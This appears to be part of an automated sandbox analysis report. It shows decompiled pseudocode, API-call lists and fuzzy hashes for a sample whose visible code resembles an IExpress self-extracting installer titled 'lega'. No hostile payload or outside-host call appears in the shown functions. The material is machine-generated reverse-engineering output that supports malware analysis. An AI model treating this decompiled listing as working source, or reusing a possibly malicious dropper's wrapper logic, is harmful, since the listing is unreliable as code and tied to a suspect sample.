                                                					}
                                                					L36:
                                                					return _t42;
                                                				}
                                                				if(_t10 == _t42) {
                                                					_t20 = _a12 - 1;
                                                					__eflags = _t20;
                                                					if(_t20 == 0) {
                                                						_t21 = GetDlgItemTextA(_t64, 0x835, 0x10691e4, 0x104);
                                                						__eflags = _t21;
                                                						if(_t21 == 0) {
                                                							L32:
                                                							_t58 = 0x4bf;
                                                							_push(0);
                                                							_push(0x10);
                                                							_push(0);
                                                							_push(0);
                                                							L25:
                                                							E010644B9(_t64, _t58);
                                                							goto L39;
                                                						}
                                                						_t49 = 0x10691e4;
                                                						do {
                                                							_t23 =  *_t49;
                                                							_t49 =  &(_t49[1]);
                                                							__eflags = _t23;
                                                						} while (_t23 != 0);
                                                						__eflags = _t49 - 0x10691e5 - 3;
                                                						if(_t49 - 0x10691e5 < 3) {
                                                							goto L32;
                                                						}
                                                						_t24 =  *0x10691e5; // 0x3a
                                                						__eflags = _t24 - 0x3a;
                                                						if(_t24 == 0x3a) {
                                                							L21:
                                                							_t25 = GetFileAttributesA(0x10691e4);
                                                							__eflags = _t25 - 0xffffffff;
                                                							if(_t25 != 0xffffffff) {
                                                								L26:
                                                								E0106658A(0x10691e4, 0x104, 0x1061140);
                                                								_t27 = E010658C8(0x10691e4);
                                                								__eflags = _t27;
                                                								if(_t27 != 0) {
                                                									__eflags =  *0x10691e4 - 0x5c;
                                                									if( *0x10691e4 != 0x5c) {
                                                										L30:
                                                										_t30 = E0106597D(0x10691e4, 1, _t64, 1);
                                                										__eflags = _t30;
                                                										if(_t30 == 0) {
                                                											L35:
                                                											_t42 = 1;
                                                											__eflags = 1;
                                                											goto L36;
                                                										}
                                                										L31:
                                                										_t42 = 1;
                                                										EndDialog(_t64, 1);
                                                										goto L36;
                                                									}
                                                									__eflags =  *0x10691e5 - 0x5c;
                                                									if( *0x10691e5 == 0x5c) {
                                                										goto L31;
                                                									}
                                                									goto L30;
                                                								}
                                                								_push(0);
                                                								_push(0x10);
                                                								_push(0);
                                                								_push(0);
                                                								_t58 = 0x4be;
                                                								goto L25;
                                                							}
                                                							_t32 = E010644B9(_t64, 0x54a, 0x10691e4, 0, 0x20, 4);
                                                							__eflags = _t32 - 6;
                                                							if(_t32 != 6) {
                                                								goto L35;
                                                							}
                                                							_t33 = CreateDirectoryA(0x10691e4, 0);
                                                							__eflags = _t33;
                                                							if(_t33 != 0) {
                                                								goto L26;
                                                							}
                                                							_push(0);
                                                							_push(0x10);
                                                							_push(0);
                                                							_push(0x10691e4);
                                                							_t58 = 0x4cb;
                                                							goto L25;
                                                						}
                                                						__eflags =  *0x10691e4 - 0x5c;
                                                						if( *0x10691e4 != 0x5c) {
                                                							goto L32;
                                                						}
                                                						__eflags = _t24 - 0x5c;
                                                						if(_t24 != 0x5c) {
                                                							goto L32;
                                                						}
                                                						goto L21;
                                                					}
                                                					_t34 = _t20 - 1;
                                                					__eflags = _t34;
                                                					if(_t34 == 0) {
                                                						EndDialog(_t64, 0);
                                                						 *0x1069124 = 0x800704c7;
                                                						goto L39;
                                                					}
                                                					__eflags = _t34 != 0x834;
                                                					if(_t34 != 0x834) {
                                                						goto L36;
                                                					}
                                                					_t37 = LoadStringA( *0x1069a3c, 0x3e8, 0x1068598, 0x200);
                                                					__eflags = _t37;
                                                					if(_t37 != 0) {
                                                						_t38 = E01064224(_t64, _t46, _t46);
                                                						__eflags = _t38;
                                                						if(_t38 == 0) {
                                                							goto L36;
                                                						}
                                                						_t39 = SetDlgItemTextA(_t64, 0x835, 0x10687a0);
                                                						__eflags = _t39;
                                                						if(_t39 != 0) {
                                                							goto L36;
                                                						}
                                                						_t63 = 0x4c0;
                                                						L9:
                                                						E010644B9(_t64, _t63, 0, 0, 0x10, 0);
                                                						_push(0);
                                                						goto L38;
                                                					}
                                                					_t63 = 0x4b1;
                                                					goto L9;
                                                				}
                                                				return 0;
                                                			}

























                                                0x0106321b
                                                0x0106321e
                                                0x01063221
                                                0x0106343c
                                                0x0106343e
                                                0x0106343f
                                                0x01063445
                                                0x01063447
                                                0x00000000
                                                0x01063447
                                                0x01063229
                                                0x0106322a
                                                0x0106322f
                                                0x010633ec
                                                0x010633f7
                                                0x01063410
                                                0x01063416
                                                0x0106341d
                                                0x0106342d
                                                0x0106342d
                                                0x01063438
                                                0x00000000
                                                0x01063438
                                                0x01063237
                                                0x01063243
                                                0x01063243
                                                0x01063246
                                                0x010632ee
                                                0x010632f4
                                                0x010632f6
                                                0x010633d4
                                                0x010633d6
                                                0x010633db
                                                0x010633dc
                                                0x010633de
                                                0x010633df
                                                0x01063370
                                                0x01063372
                                                0x00000000
                                                0x01063372
                                                0x010632fc
                                                0x01063301
                                                0x01063301
                                                0x01063303
                                                0x01063304
                                                0x01063304
                                                0x0106330a
                                                0x0106330d
                                                0x00000000
                                                0x00000000
                                                0x01063313
                                                0x01063318
                                                0x0106331a
                                                0x01063331
                                                0x01063332
                                                0x0106333a
                                                0x0106333d
                                                0x0106337c
                                                0x01063388
                                                0x0106338f
                                                0x01063394
                                                0x01063396
                                                0x010633a4
                                                0x010633ab
                                                0x010633b6
                                                0x010633be
                                                0x010633c3
                                                0x010633c5
                                                0x01063435
                                                0x01063437
                                                0x01063437
                                                0x00000000
                                                0x01063437
                                                0x010633c7
                                                0x010633c9
                                                0x010633cc
                                                0x00000000
                                                0x010633cc
                                                0x010633ad
                                                0x010633b4
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x010633b4
                                                0x01063398
                                                0x01063399
                                                0x0106339b
                                                0x0106339c
                                                0x0106339d
                                                0x00000000
                                                0x0106339d
                                                0x0106334c
                                                0x01063351
                                                0x01063354
                                                0x00000000
                                                0x00000000
                                                0x0106335c
                                                0x01063362
                                                0x01063364
                                                0x00000000
                                                0x00000000
                                                0x01063366
                                                0x01063367
                                                0x01063369
                                                0x0106336a
                                                0x0106336b
                                                0x00000000
                                                0x0106336b
                                                0x0106331c
                                                0x01063323
                                                0x00000000
                                                0x00000000
                                                0x01063329
                                                0x0106332b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0106332b
                                                0x0106324c
                                                0x0106324c
                                                0x0106324f
                                                0x010632c8
                                                0x010632ce
                                                0x00000000
                                                0x010632ce
                                                0x01063251
                                                0x01063256
                                                0x00000000
                                                0x00000000
                                                0x01063271
                                                0x01063277
                                                0x01063279
                                                0x01063298
                                                0x0106329d
                                                0x0106329f
                                                0x00000000
                                                0x00000000
                                                0x010632b0
                                                0x010632b6
                                                0x010632b8
                                                0x00000000
                                                0x00000000
                                                0x010632be
                                                0x01063280
                                                0x01063289
                                                0x0106328e
                                                0x00000000
                                                0x0106328e
                                                0x0106327b
                                                0x00000000
                                                0x0106327b
                                                0x00000000

                                                APIs
                                                • LoadStringA.USER32(000003E8,01068598,00000200), ref: 01063271
                                                • GetDesktopWindow.USER32 ref: 010633E2
                                                • SetWindowTextA.USER32(?,lega), ref: 010633F7
                                                • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 01063410
                                                • GetDlgItem.USER32(?,00000836), ref: 01063426
                                                • EnableWindow.USER32(00000000), ref: 0106342D
                                                • EndDialog.USER32(?,00000000), ref: 0106343F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                                                • Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_1060000_will6283.jbxd
                                                Similarity
                                                • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$lega
                                                • API String ID: 2418873061-1526836103
                                                • Opcode ID: 8f4065014b70a840bd247e5cbbf8f90ff4332b7084d106ec089c41703fb71ee1
                                                • Instruction ID: ff368d0752addf15fe513067042561e84210777cf9d28e775626aa43e453faa8
                                                • Opcode Fuzzy Hash: 8f4065014b70a840bd247e5cbbf8f90ff4332b7084d106ec089c41703fb71ee1
                                                • Instruction Fuzzy Hash: 9B51C570341251FAFB726A395C4CF7B699DBB45B54F108028F6C9EE5D5CEAA940183E0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 93%
                                                			E01062CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
                                                				signed int _v8;
                                                				char _v268;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t13;
                                                				void* _t20;
                                                				void* _t23;
                                                				void* _t27;
                                                				struct HRSRC__* _t31;
                                                				intOrPtr _t33;
                                                				void* _t43;
                                                				void* _t48;
                                                				signed int _t65;
                                                				struct HINSTANCE__* _t66;
                                                				signed int _t67;
                                                
                                                				_t13 =  *0x1068004; // 0x19e58fb5
                                                				_v8 = _t13 ^ _t67;
                                                				_t65 = 0;
                                                				_t66 = __ecx;
                                                				_t48 = __edx;
                                                				 *0x1069a3c = __ecx;
                                                				memset(0x1069140, 0, 0x8fc);
                                                				memset(0x1068a20, 0, 0x32c);
                                                				memset(0x10688c0, 0, 0x104);
                                                				 *0x10693ec = 1;
                                                				_t20 = E0106468F("TITLE", 0x1069154, 0x7f);
                                                				if(_t20 == 0 || _t20 > 0x80) {
                                                					_t64 = 0x4b1;
                                                					goto L32;
                                                				} else {
                                                					_t27 = CreateEventA(0, 1, 1, 0);
                                                					 *0x106858c = _t27;
                                                					SetEvent(_t27);
                                                					_t64 = 0x1069a34;
                                                					if(E0106468F("EXTRACTOPT", 0x1069a34, 4) != 0) {
                                                						if(( *0x1069a34 & 0x000000c0) == 0) {
                                                							L12:
                                                							 *0x1069120 =  *0x1069120 & _t65;
                                                							if(E01065C9E(_t48, _t48, _t65, _t66) != 0) {
                                                								if( *0x1068a3a == 0) {
                                                									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
                                                									if(_t31 != 0) {
                                                										_t65 = LoadResource(_t66, _t31);
                                                									}
                                                									if( *0x1068184 != 0) {
                                                										__imp__#17();
                                                									}
                                                									if( *0x1068a24 == 0) {
                                                										_t57 = _t65;
                                                										if(E010636EE(_t65) == 0) {
                                                											goto L33;
                                                										} else {
                                                											_t33 =  *0x1069a40; // 0x3
                                                											_t48 = 1;
                                                											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
                                                												if(( *0x1069a34 & 0x00000100) == 0 || ( *0x1068a38 & 0x00000001) != 0 || E010618A3(_t64, _t66) != 0) {
                                                													goto L30;
                                                												} else {
                                                													_t64 = 0x7d6;
                                                													if(E01066517(_t57, 0x7d6, _t34, E010619E0, 0x547, 0x83e) != 0x83d) {
                                                														goto L33;
                                                													} else {
                                                														goto L30;
                                                													}
                                                												}
                                                											} else {
                                                												L30:
                                                												_t23 = _t48;
                                                											}
                                                										}
                                                									} else {
                                                										_t23 = 1;
                                                									}
                                                								} else {
                                                									E01062390(0x1068a3a);
                                                									goto L33;
                                                								}
                                                							} else {
                                                								_t64 = 0x520;
                                                								L32:
                                                								E010644B9(0, _t64, 0, 0, 0x10, 0);
                                                								goto L33;
                                                							}
                                                						} else {
                                                							_t64 =  &_v268;
                                                							if(E0106468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
                                                								goto L3;
                                                							} else {
                                                								_t43 = CreateMutexA(0, 1,  &_v268);
                                                								 *0x1068588 = _t43;
                                                								if(_t43 == 0 || GetLastError() != 0xb7) {
                                                									goto L12;
                                                								} else {
                                                									if(( *0x1069a34 & 0x00000080) == 0) {
                                                										_t64 = 0x524;
                                                										if(E010644B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
                                                											goto L12;
                                                										} else {
                                                											goto L11;
                                                										}
                                                									} else {
                                                										_t64 = 0x54b;
                                                										E010644B9(0, 0x54b, "lega", 0, 0x10, 0);
                                                										L11:
                                                										CloseHandle( *0x1068588);
                                                										 *0x1069124 = 0x800700b7;
                                                										goto L33;
                                                									}
                                                								}
                                                							}
                                                						}
                                                					} else {
                                                						L3:
                                                						_t64 = 0x4b1;
                                                						E010644B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                						 *0x1069124 = 0x80070714;
                                                						L33:
                                                						_t23 = 0;
                                                					}
                                                				}
                                                				return E01066CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
                                                			}



















                                                0x01062cb5
                                                0x01062cbc
                                                0x01062cc7
                                                0x01062cc9
                                                0x01062cd1
                                                0x01062cd3
                                                0x01062cd9
                                                0x01062ce9
                                                0x01062cf9
                                                0x01062d0e
                                                0x01062d15
                                                0x01062d1c
                                                0x01062ef3
                                                0x00000000
                                                0x01062d2d
                                                0x01062d34
                                                0x01062d3b
                                                0x01062d40
                                                0x01062d48
                                                0x01062d59
                                                0x01062d84
                                                0x01062e1f
                                                0x01062e1f
                                                0x01062e2e
                                                0x01062e41
                                                0x01062e5a
                                                0x01062e62
                                                0x01062e6c
                                                0x01062e6c
                                                0x01062e75
                                                0x01062e77
                                                0x01062e77
                                                0x01062e84
                                                0x01062e8b
                                                0x01062e94
                                                0x00000000
                                                0x01062e96
                                                0x01062e96
                                                0x01062e9e
                                                0x01062ea2
                                                0x01062eba
                                                0x00000000
                                                0x01062ece
                                                0x01062ede
                                                0x01062eed
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01062eed
                                                0x01062eef
                                                0x01062eef
                                                0x01062eef
                                                0x01062eef
                                                0x01062ea2
                                                0x01062e86
                                                0x01062e88
                                                0x01062e88
                                                0x01062e43
                                                0x01062e48
                                                0x00000000
                                                0x01062e48
                                                0x01062e30
                                                0x01062e30
                                                0x01062ef8
                                                0x01062f01
                                                0x00000000
                                                0x01062f01
                                                0x01062d8a
                                                0x01062d8f
                                                0x01062da1
                                                0x00000000
                                                0x01062da3
                                                0x01062dae
                                                0x01062db4
                                                0x01062dbb
                                                0x00000000
                                                0x01062dca
                                                0x01062dd3
                                                0x01062df5
                                                0x01062e02
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01062dd5
                                                0x01062dde
                                                0x01062de3
                                                0x01062e04
                                                0x01062e0a
                                                0x01062e10
                                                0x00000000
                                                0x01062e10
                                                0x01062dd3
                                                0x01062dbb
                                                0x01062da1
                                                0x01062d5b
                                                0x01062d5b
                                                0x01062d5d
                                                0x01062d69
                                                0x01062d6e
                                                0x01062f06
                                                0x01062f06
                                                0x01062f06
                                                0x01062d59
                                                0x01062f18

                                                APIs
                                                • memset.MSVCRT ref: 01062CD9
                                                • memset.MSVCRT ref: 01062CE9
                                                • memset.MSVCRT ref: 01062CF9
                                                  • Part of subcall function 0106468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010646A0
                                                  • Part of subcall function 0106468F: SizeofResource.KERNEL32(00000000,00000000,?,01062D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010646A9
                                                  • Part of subcall function 0106468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010646C3
                                                  • Part of subcall function 0106468F: LoadResource.KERNEL32(00000000,00000000,?,01062D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010646CC
                                                  • Part of subcall function 0106468F: LockResource.KERNEL32(00000000,?,01062D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010646D3
                                                  • Part of subcall function 0106468F: memcpy_s.MSVCRT ref: 010646E5
                                                  • Part of subcall function 0106468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010646EF
                                                • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 01062D34
                                                • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 01062D40
                                                • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 01062DAE
                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 01062DBD
                                                • CloseHandle.KERNEL32(lega,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 01062E0A
                                                  • Part of subcall function 010644B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 01064518
                                                  • Part of subcall function 010644B9: MessageBoxA.USER32(?,?,lega,00010010), ref: 01064554
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                                                • Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_1060000_will6283.jbxd
                                                Similarity
                                                • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$lega
                                                • API String ID: 1002816675-2051202908
                                                • Opcode ID: 0ce05f384e6f1c0fd01021c2302d070debda6850256913013bc844abbd96d5af
                                                • Instruction ID: 99a3388aa6dc7a97141060776444e26f862b2350f10d17229451dbaf23eaec59
                                                • Opcode Fuzzy Hash: 0ce05f384e6f1c0fd01021c2302d070debda6850256913013bc844abbd96d5af
                                                • Instruction Fuzzy Hash: 3351F770340302AAFB70A6299D49B7B36DDEB95704F004039FAC1DA5D8DBBD8881C761
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 81%
                                                			E010634F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                				void* _t9;
                                                				void* _t12;
                                                				void* _t13;
                                                				void* _t17;
                                                				void* _t23;
                                                				void* _t25;
                                                				struct HWND__* _t35;
                                                				struct HWND__* _t38;
                                                				void* _t39;
                                                
                                                				_t9 = _a8 - 0x10;
                                                				if(_t9 == 0) {
                                                					__eflags = 1;
                                                					L19:
                                                					_push(0);
                                                					 *0x10691d8 = 1;
                                                					L20:
                                                					_push(_a4);
                                                					L21:
                                                					EndDialog();
                                                					L22:
                                                					return 1;
                                                				}
                                                				_push(1);
                                                				_pop(1);
                                                				_t12 = _t9 - 0xf2;
                                                				if(_t12 == 0) {
                                                					__eflags = _a12 - 0x1b;
                                                					if(_a12 != 0x1b) {
                                                						goto L22;
                                                					}
                                                					goto L19;
                                                				}
                                                				_t13 = _t12 - 0xe;
                                                				if(_t13 == 0) {
                                                					_t35 = _a4;
                                                					 *0x1068584 = _t35;
                                                					E010643D0(_t35, GetDesktopWindow());
                                                					__eflags =  *0x1068184; // 0x1
                                                					if(__eflags != 0) {
                                                						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
                                                						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
                                                					}
                                                					SetWindowTextA(_t35, "lega");
                                                					_t17 = CreateThread(0, 0, E01064FE0, 0, 0, 0x1068798);
                                                					 *0x106879c = _t17;
                                                					__eflags = _t17;
                                                					if(_t17 != 0) {
                                                						goto L22;
                                                					} else {
                                                						E010644B9(_t35, 0x4b8, 0, 0, 0x10, 0);
                                                						_push(0);
                                                						_push(_t35);
                                                						goto L21;
                                                					}
                                                				}
                                                				_t23 = _t13 - 1;
                                                				if(_t23 == 0) {
                                                					__eflags = _a12 - 2;
                                                					if(_a12 != 2) {
                                                						goto L22;
                                                					}
                                                					ResetEvent( *0x106858c);
                                                					_t38 =  *0x1068584; // 0x0
                                                					_t25 = E010644B9(_t38, 0x4b2, 0x1061140, 0, 0x20, 4);
                                                					__eflags = _t25 - 6;
                                                					if(_t25 == 6) {
                                                						L11:
                                                						 *0x10691d8 = 1;
                                                						SetEvent( *0x106858c);
                                                						_t39 =  *0x106879c; // 0x0
                                                						E01063680(_t39);
                                                						_push(0);
                                                						goto L20;
                                                					}
                                                					__eflags = _t25 - 1;
                                                					if(_t25 == 1) {
                                                						goto L11;
                                                					}
                                                					SetEvent( *0x106858c);
                                                					goto L22;
                                                				}
                                                				if(_t23 == 0xe90) {
                                                					TerminateThread( *0x106879c, 0);
                                                					EndDialog(_a4, _a12);
                                                					return 1;
                                                				}
                                                				return 0;
                                                			}












                                                0x010634fb
                                                0x010634fe
                                                0x01063665
                                                0x01063666
                                                0x01063666
                                                0x01063668
                                                0x0106366e
                                                0x0106366e
                                                0x01063671
                                                0x01063671
                                                0x01063677
                                                0x00000000
                                                0x01063677
                                                0x01063504
                                                0x01063506
                                                0x01063507
                                                0x0106350c
                                                0x0106365b
                                                0x0106365f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01063661
                                                0x01063512
                                                0x01063515
                                                0x010635be
                                                0x010635c1
                                                0x010635d1
                                                0x010635d8
                                                0x010635de
                                                0x010635f8
                                                0x01063617
                                                0x01063617
                                                0x01063623
                                                0x01063637
                                                0x0106363d
                                                0x01063642
                                                0x01063644
                                                0x00000000
                                                0x01063646
                                                0x01063652
                                                0x01063657
                                                0x01063658
                                                0x00000000
                                                0x01063658
                                                0x01063644
                                                0x0106351b
                                                0x0106351d
                                                0x0106354f
                                                0x01063553
                                                0x00000000
                                                0x00000000
                                                0x0106355f
                                                0x01063565
                                                0x0106357c
                                                0x01063581
                                                0x01063584
                                                0x0106359b
                                                0x010635a1
                                                0x010635a7
                                                0x010635ad
                                                0x010635b3
                                                0x010635b8
                                                0x00000000
                                                0x010635b8
                                                0x01063586
                                                0x01063588
                                                0x00000000
                                                0x00000000
                                                0x01063590
                                                0x00000000
                                                0x01063590
                                                0x01063524
                                                0x01063535
                                                0x01063541
                                                0x00000000
                                                0x01063549
                                                0x00000000

                                                APIs
                                                • TerminateThread.KERNEL32(00000000), ref: 01063535
                                                • EndDialog.USER32(?,?), ref: 01063541
                                                • ResetEvent.KERNEL32 ref: 0106355F
                                                • SetEvent.KERNEL32(01061140,00000000,00000020,00000004), ref: 01063590
                                                • GetDesktopWindow.USER32 ref: 010635C7
                                                • GetDlgItem.USER32(?,0000083B), ref: 010635F1
                                                • SendMessageA.USER32(00000000), ref: 010635F8
                                                • GetDlgItem.USER32(?,0000083B), ref: 01063610
                                                • SendMessageA.USER32(00000000), ref: 01063617
                                                • SetWindowTextA.USER32(?,lega), ref: 01063623
                                                • CreateThread.KERNEL32 ref: 01063637
                                                • EndDialog.USER32(?,00000000), ref: 01063671
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                                                • Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_1060000_will6283.jbxd
                                                Similarity
                                                • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                • String ID: lega
                                                • API String ID: 2406144884-245445314
                                                • Opcode ID: 5be70d12100ed1ddd8c87dda148a45f2e9dae039896a190a43f942926a331df9
                                                • Instruction ID: c0c0eed38c03c37f29a90793f628d2f7ed3e0d787baa8974bb14711bc0abdf84
                                                • Opcode Fuzzy Hash: 5be70d12100ed1ddd8c87dda148a45f2e9dae039896a190a43f942926a331df9
                                                • Instruction Fuzzy Hash: 1D318A71240311FBD7701F29AC4DE2A3EACF789B55F108519F7C5AE2A8CB7A8810CB94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 50%
                                                			E01064224(char __ecx) {
                                                				char* _v8;
                                                				_Unknown_base(*)()* _v12;
                                                				_Unknown_base(*)()* _v16;
                                                				_Unknown_base(*)()* _v20;
                                                				char* _v28;
                                                				intOrPtr _v32;
                                                				intOrPtr _v36;
                                                				intOrPtr _v40;
                                                				char _v44;
                                                				char _v48;
                                                				char _v52;
                                                				_Unknown_base(*)()* _t26;
                                                				_Unknown_base(*)()* _t28;
                                                				_Unknown_base(*)()* _t29;
                                                				_Unknown_base(*)()* _t32;
                                                				char _t42;
                                                				char* _t44;
                                                				char* _t61;
                                                				void* _t63;
                                                				char* _t65;
                                                				struct HINSTANCE__* _t66;
                                                				char _t67;
                                                				void* _t71;
                                                				char _t76;
                                                				intOrPtr _t85;
                                                
                                                				_t67 = __ecx;
                                                				_t66 = LoadLibraryA("SHELL32.DLL");
                                                				if(_t66 == 0) {
                                                					_t63 = 0x4c2;
                                                					L22:
                                                					E010644B9(_t67, _t63, 0, 0, 0x10, 0);
                                                					return 0;
                                                				}
                                                				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
                                                				_v12 = _t26;
                                                				if(_t26 == 0) {
                                                					L20:
                                                					FreeLibrary(_t66);
                                                					_t63 = 0x4c1;
                                                					goto L22;
                                                				}
                                                				_t28 = GetProcAddress(_t66, 0xc3);
                                                				_v20 = _t28;
                                                				if(_t28 == 0) {
                                                					goto L20;
                                                				}
                                                				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
                                                				_v16 = _t29;
                                                				if(_t29 == 0) {
                                                					goto L20;
                                                				}
                                                				_t76 =  *0x10688c0; // 0x0
                                                				if(_t76 != 0) {
                                                					L10:
                                                					 *0x10687a0 = 0;
                                                					_v52 = _t67;
                                                					_v48 = 0;
                                                					_v44 = 0;
                                                					_v40 = 0x1068598;
                                                					_v36 = 1;
                                                					_v32 = E01064200;
                                                					_v28 = 0x10688c0;
                                                					 *0x106a288( &_v52);
                                                					_t32 =  *_v12();
                                                					if(_t71 != _t71) {
                                                						asm("int 0x29");
                                                					}
                                                					_v12 = _t32;
                                                					if(_t32 != 0) {
                                                						 *0x106a288(_t32, 0x10688c0);
                                                						 *_v16();
                                                						if(_t71 != _t71) {
                                                							asm("int 0x29");
                                                						}
                                                						if( *0x10688c0 != 0) {
                                                							E01061680(0x10687a0, 0x104, 0x10688c0);
                                                						}
                                                						 *0x106a288(_v12);
                                                						 *_v20();
                                                						if(_t71 != _t71) {
                                                							asm("int 0x29");
                                                						}
                                                					}
                                                					FreeLibrary(_t66);
                                                					_t85 =  *0x10687a0; // 0x0
                                                					return 0 | _t85 != 0x00000000;
                                                				} else {
                                                					GetTempPathA(0x104, 0x10688c0);
                                                					_t61 = 0x10688c0;
                                                					_t4 =  &(_t61[1]); // 0x10688c1
                                                					_t65 = _t4;
                                                					do {
                                                						_t42 =  *_t61;
                                                						_t61 =  &(_t61[1]);
                                                					} while (_t42 != 0);
                                                					_t5 = _t61 - _t65 + 0x10688c0; // 0x20d1181
                                                					_t44 = CharPrevA(0x10688c0, _t5);
                                                					_v8 = _t44;
                                                					if( *_t44 == 0x5c &&  *(CharPrevA(0x10688c0, _t44)) != 0x3a) {
                                                						 *_v8 = 0;
                                                					}
                                                					goto L10;
                                                				}
                                                			}




























                                                0x01064234
                                                0x0106423c
                                                0x01064240
                                                0x010643b2
                                                0x010643b7
                                                0x010643c0
                                                0x00000000
                                                0x010643c5
                                                0x0106424c
                                                0x01064252
                                                0x01064257
                                                0x010643a4
                                                0x010643a5
                                                0x010643ab
                                                0x00000000
                                                0x010643ab
                                                0x01064263
                                                0x01064269
                                                0x0106426e
                                                0x00000000
                                                0x00000000
                                                0x0106427a
                                                0x01064280
                                                0x01064285
                                                0x00000000
                                                0x00000000
                                                0x0106428d
                                                0x01064293
                                                0x010642e6
                                                0x010642e9
                                                0x010642ef
                                                0x010642f4
                                                0x010642f7
                                                0x01064300
                                                0x01064307
                                                0x0106430e
                                                0x01064315
                                                0x0106431c
                                                0x01064322
                                                0x01064326
                                                0x0106432d
                                                0x0106432d
                                                0x0106432f
                                                0x01064334
                                                0x01064343
                                                0x01064349
                                                0x0106434d
                                                0x01064354
                                                0x01064354
                                                0x0106435d
                                                0x0106436e
                                                0x0106436e
                                                0x0106437d
                                                0x01064383
                                                0x01064387
                                                0x0106438e
                                                0x0106438e
                                                0x01064387
                                                0x01064391
                                                0x01064399
                                                0x00000000
                                                0x01064295
                                                0x0106429f
                                                0x010642a5
                                                0x010642aa
                                                0x010642aa
                                                0x010642ad
                                                0x010642ad
                                                0x010642af
                                                0x010642b0
                                                0x010642b6
                                                0x010642c2
                                                0x010642c8
                                                0x010642ce
                                                0x010642e4
                                                0x010642e4
                                                0x00000000
                                                0x010642ce

                                                APIs
                                                • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 01064236
                                                • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 0106424C
                                                • GetProcAddress.KERNEL32(00000000,000000C3), ref: 01064263
                                                • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 0106427A
                                                • GetTempPathA.KERNEL32(00000104,010688C0,?,00000001), ref: 0106429F
                                                • CharPrevA.USER32(010688C0,020D1181,?,00000001), ref: 010642C2
